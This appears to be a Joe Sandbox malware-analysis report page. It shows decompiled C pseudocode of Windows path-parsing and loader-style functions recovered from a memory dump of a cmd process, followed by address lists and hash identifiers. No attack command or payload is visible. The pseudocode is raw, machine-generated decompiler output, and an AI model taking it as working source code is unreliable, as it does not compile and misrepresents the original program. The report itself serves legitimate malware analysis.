                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E03BF4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x3ccd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E03C0F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03BF6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03BF4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03BF6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M03BF45F8))) {
												case 0:
													_v568 = 0x3bb1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x3bb11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03BF4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E03C1F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E03C1F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E03BD52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E03BEEB70(1, 0x3cc79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E03BEAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E03C195D0();
																			L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E03C1B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03C13D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E03C1B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                          0x03bf4128
                                                                                                                                          0x03bf4135
                                                                                                                                          0x03bf413c
                                                                                                                                          0x03bf4141
                                                                                                                                          0x03bf4145
                                                                                                                                          0x03bf4147
                                                                                                                                          0x03bf414e
                                                                                                                                          0x03bf4151
                                                                                                                                          0x03bf4159
                                                                                                                                          0x03bf415c
                                                                                                                                          0x03bf4160
                                                                                                                                          0x03bf4164
                                                                                                                                          0x03bf4168
                                                                                                                                          0x03bf416c
                                                                                                                                          0x03bf417f
                                                                                                                                          0x03bf4181
                                                                                                                                          0x03bf446a
                                                                                                                                          0x03bf446a
                                                                                                                                          0x03bf418c
                                                                                                                                          0x03bf4195
                                                                                                                                          0x03bf4199
                                                                                                                                          0x03bf4432
                                                                                                                                          0x03bf4439
                                                                                                                                          0x03bf443d
                                                                                                                                          0x03bf4442
                                                                                                                                          0x03bf4447
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf419f
                                                                                                                                          0x03bf41a3
                                                                                                                                          0x03bf41b1
                                                                                                                                          0x03bf41b9
                                                                                                                                          0x03bf41bd
                                                                                                                                          0x03bf45db
                                                                                                                                          0x03bf45db
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf41c3
                                                                                                                                          0x03bf41c3
                                                                                                                                          0x03bf41ce
                                                                                                                                          0x03bf41d4
                                                                                                                                          0x03c3e138
                                                                                                                                          0x03c3e13e
                                                                                                                                          0x03c3e169
                                                                                                                                          0x03c3e16d
                                                                                                                                          0x03c3e19e
                                                                                                                                          0x03c3e16f
                                                                                                                                          0x03c3e16f
                                                                                                                                          0x03c3e175
                                                                                                                                          0x03c3e179
                                                                                                                                          0x03c3e18f
                                                                                                                                          0x03c3e193
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3e199
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3e199
                                                                                                                                          0x03c3e193
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf41da
                                                                                                                                          0x03bf41da
                                                                                                                                          0x03bf41df
                                                                                                                                          0x03bf41e4
                                                                                                                                          0x03bf41ec
                                                                                                                                          0x03bf4203
                                                                                                                                          0x03bf4207
                                                                                                                                          0x03c3e1fd
                                                                                                                                          0x03bf4222
                                                                                                                                          0x03bf4226
                                                                                                                                          0x03c3e1f3
                                                                                                                                          0x03c3e1f3
                                                                                                                                          0x03bf422c
                                                                                                                                          0x03bf422c
                                                                                                                                          0x03bf4233
                                                                                                                                          0x03c3e1ed
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf4239
                                                                                                                                          0x03bf4239
                                                                                                                                          0x03bf4239
                                                                                                                                          0x03bf4239
                                                                                                                                          0x03bf4233
                                                                                                                                          0x03bf4226
                                                                                                                                          0x03bf41ee
                                                                                                                                          0x03bf41ee
                                                                                                                                          0x03bf41f4
                                                                                                                                          0x03bf4575
                                                                                                                                          0x03c3e1b1
                                                                                                                                          0x03c3e1b1
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf457b
                                                                                                                                          0x03bf457b
                                                                                                                                          0x03bf4582
                                                                                                                                          0x03c3e1ab
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf4588
                                                                                                                                          0x03bf4588
                                                                                                                                          0x03bf458c
                                                                                                                                          0x03c3e1c4
                                                                                                                                          0x03c3e1c4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf4592
                                                                                                                                          0x03bf4592
                                                                                                                                          0x03bf4599
                                                                                                                                          0x03c3e1be
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf459f
                                                                                                                                          0x03bf459f
                                                                                                                                          0x03bf45a3
                                                                                                                                          0x03c3e1d7
                                                                                                                                          0x03c3e1e4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45a9
                                                                                                                                          0x03bf45a9
                                                                                                                                          0x03bf45b0
                                                                                                                                          0x03c3e1d1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45b6
                                                                                                                                          0x03bf45b6
                                                                                                                                          0x03bf45b6
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45b6
                                                                                                                                          0x03bf45b0
                                                                                                                                          0x03bf45a3
                                                                                                                                          0x03bf4599
                                                                                                                                          0x03bf458c
                                                                                                                                          0x03bf4582
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf41f4
                                                                                                                                          0x03bf423e
                                                                                                                                          0x03bf4241
                                                                                                                                          0x03bf45c0
                                                                                                                                          0x03bf45c4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45ca
                                                                                                                                          0x03bf45ca
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3e207
                                                                                                                                          0x03c3e20f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45d1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45ca
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf4247
                                                                                                                                          0x03bf4247
                                                                                                                                          0x03bf4247
                                                                                                                                          0x03bf4249
                                                                                                                                          0x03bf4249
                                                                                                                                          0x03bf4249
                                                                                                                                          0x03bf4251
                                                                                                                                          0x03bf4251
                                                                                                                                          0x03bf4257
                                                                                                                                          0x03bf425f
                                                                                                                                          0x03bf426e
                                                                                                                                          0x03bf4270
                                                                                                                                          0x03bf427a
                                                                                                                                          0x03c3e219
                                                                                                                                          0x03c3e219
                                                                                                                                          0x03bf4280
                                                                                                                                          0x03bf4282
                                                                                                                                          0x03bf4456
                                                                                                                                          0x03bf45ea
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf45f0
                                                                                                                                          0x03c3e223
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3e223
                                                                                                                                          0x03bf445c
                                                                                                                                          0x03bf445c
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf445c
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf4288
                                                                                                                                          0x03bf428c
                                                                                                                                          0x03c3e298
                                                                                                                                          0x03bf4292
                                                                                                                                          0x03bf4292
                                                                                                                                          0x03bf429e
                                                                                                                                          0x03bf42a3
                                                                                                                                          0x03bf42a7
                                                                                                                                          0x03bf42ac
                                                                                                                                          0x03c3e22d
                                                                                                                                          0x03bf42b2
                                                                                                                                          0x03bf42b2
                                                                                                                                          0x03bf42b9
                                                                                                                                          0x03bf42bc
                                                                                                                                          0x03bf42c2
                                                                                                                                          0x03bf42ca
                                                                                                                                          0x03bf42cd
                                                                                                                                          0x03bf42cd
                                                                                                                                          0x03bf42d4
                                                                                                                                          0x03bf433f
                                                                                                                                          0x03bf433f
                                                                                                                                          0x03bf42d6
                                                                                                                                          0x03bf42d6
                                                                                                                                          0x03bf42d9
                                                                                                                                          0x03bf42dd
                                                                                                                                          0x03bf42eb
                                                                                                                                          0x03c3e23a
                                                                                                                                          0x03bf42f1
                                                                                                                                          0x03bf4305
                                                                                                                                          0x03bf430d
                                                                                                                                          0x03bf4315
                                                                                                                                          0x03bf4318
                                                                                                                                          0x03bf431f
                                                                                                                                          0x03bf4322
                                                                                                                                          0x03bf432e
                                                                                                                                          0x03bf433b
                                                                                                                                          0x03bf433b
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf432e
                                                                                                                                          0x03bf42eb
                                                                                                                                          0x03bf434c
                                                                                                                                          0x03bf434e
                                                                                                                                          0x03bf4352
                                                                                                                                          0x03bf4359
                                                                                                                                          0x03bf435e
                                                                                                                                          0x03bf4361
                                                                                                                                          0x03bf436e
                                                                                                                                          0x03bf438a
                                                                                                                                          0x03bf438e
                                                                                                                                          0x03bf4396
                                                                                                                                          0x03bf439e
                                                                                                                                          0x03bf43a1
                                                                                                                                          0x03bf43ad
                                                                                                                                          0x03bf43bb
                                                                                                                                          0x03bf43bb
                                                                                                                                          0x03bf43ad
                                                                                                                                          0x03bf436e
                                                                                                                                          0x03bf43bf
                                                                                                                                          0x03bf43c5
                                                                                                                                          0x03bf4463
                                                                                                                                          0x03bf4463
                                                                                                                                          0x03bf43ce
                                                                                                                                          0x03bf43d5
                                                                                                                                          0x03bf43d9
                                                                                                                                          0x03bf43df
                                                                                                                                          0x03bf4475
                                                                                                                                          0x03bf4479
                                                                                                                                          0x03bf4491
                                                                                                                                          0x03bf4491
                                                                                                                                          0x03bf4479
                                                                                                                                          0x03bf43e5
                                                                                                                                          0x03bf43eb
                                                                                                                                          0x03bf43f4
                                                                                                                                          0x03bf43f6
                                                                                                                                          0x03bf43f9
                                                                                                                                          0x03bf43fc
                                                                                                                                          0x03bf43ff
                                                                                                                                          0x03bf44e8
                                                                                                                                          0x03bf44ed
                                                                                                                                          0x03bf44f3
                                                                                                                                          0x03c3e247
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf44f9
                                                                                                                                          0x03bf4504
                                                                                                                                          0x03bf4508
                                                                                                                                          0x03bf450f
                                                                                                                                          0x03c3e269
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf4515
                                                                                                                                          0x03bf4519
                                                                                                                                          0x03bf4531
                                                                                                                                          0x03bf4534
                                                                                                                                          0x03bf4537
                                                                                                                                          0x03bf453e
                                                                                                                                          0x03bf4541
                                                                                                                                          0x03bf454a
                                                                                                                                          0x03c3e255
                                                                                                                                          0x03c3e255
                                                                                                                                          0x03c3e25b
                                                                                                                                          0x03c3e25e
                                                                                                                                          0x03c3e261
                                                                                                                                          0x03c3e261
                                                                                                                                          0x03bf4555
                                                                                                                                          0x03bf4559
                                                                                                                                          0x03bf455d
                                                                                                                                          0x03c3e26d
                                                                                                                                          0x03c3e270
                                                                                                                                          0x03c3e274
                                                                                                                                          0x03c3e27a
                                                                                                                                          0x03c3e27d
                                                                                                                                          0x03c3e28e
                                                                                                                                          0x03c3e28e
                                                                                                                                          0x03bf4563
                                                                                                                                          0x03bf4563
                                                                                                                                          0x03bf4569
                                                                                                                                          0x03bf4569
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf455d
                                                                                                                                          0x03bf450f
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf44f3
                                                                                                                                          0x03bf43ff
                                                                                                                                          0x03bf4405
                                                                                                                                          0x03bf4405
                                                                                                                                          0x03bf4405
                                                                                                                                          0x03bf42ac
                                                                                                                                          0x03bf428c
                                                                                                                                          0x03bf4282
                                                                                                                                          0x03bf4407
                                                                                                                                          0x03bf440d
                                                                                                                                          0x03c3e2af
                                                                                                                                          0x03c3e2af
                                                                                                                                          0x03bf4413
                                                                                                                                          0x03bf4413
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf41d4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf41c3
                                                                                                                                          0x03bf41bd
                                                                                                                                          0x03bf4415
                                                                                                                                          0x03bf4415
                                                                                                                                          0x03bf4416
                                                                                                                                          0x03bf4417
                                                                                                                                          0x03bf4429
                                                                                                                                          0x03bf416e
                                                                                                                                          0x03bf416e
                                                                                                                                          0x03bf4175
                                                                                                                                          0x03bf4498
                                                                                                                                          0x03bf449f
                                                                                                                                          0x03c3e12d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3e133
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3e133
                                                                                                                                          0x03bf44a5
                                                                                                                                          0x03bf44a5
                                                                                                                                          0x03bf44aa
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf44bb
                                                                                                                                          0x03bf44ca
                                                                                                                                          0x03bf44d6
                                                                                                                                          0x03bf44d7
                                                                                                                                          0x03bf44d8
                                                                                                                                          0x03bf44e3
                                                                                                                                          0x03bf44e3
                                                                                                                                          0x03bf44aa
                                                                                                                                          0x03bf417b
                                                                                                                                          0x03bf417b
                                                                                                                                          0x03bf417b
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf417b
                                                                                                                                          0x03bf4175
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 972f2c15c72a599c69d6671f9eef9e5554ecafb058555354b2a54081fff45487
                                                                                                                                          • Instruction ID: f0ecf7cf0df1cfb92cc12722d667a630a8b2733c8a14d73d60684079514d87c7
                                                                                                                                          • Opcode Fuzzy Hash: 972f2c15c72a599c69d6671f9eef9e5554ecafb058555354b2a54081fff45487
                                                                                                                                          • Instruction Fuzzy Hash: 33F16D756082118FC724DF2AC480A3BF7E1EF89708F0959AEF586CB250EB35D959CB52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C020A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E03C020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3cc8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03C02EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03C02EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E03BD58EC(_t240);
									_t221 =  *0x3cc5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3cc5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03C14A2C(0x3cc6e40, 0x3c14b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
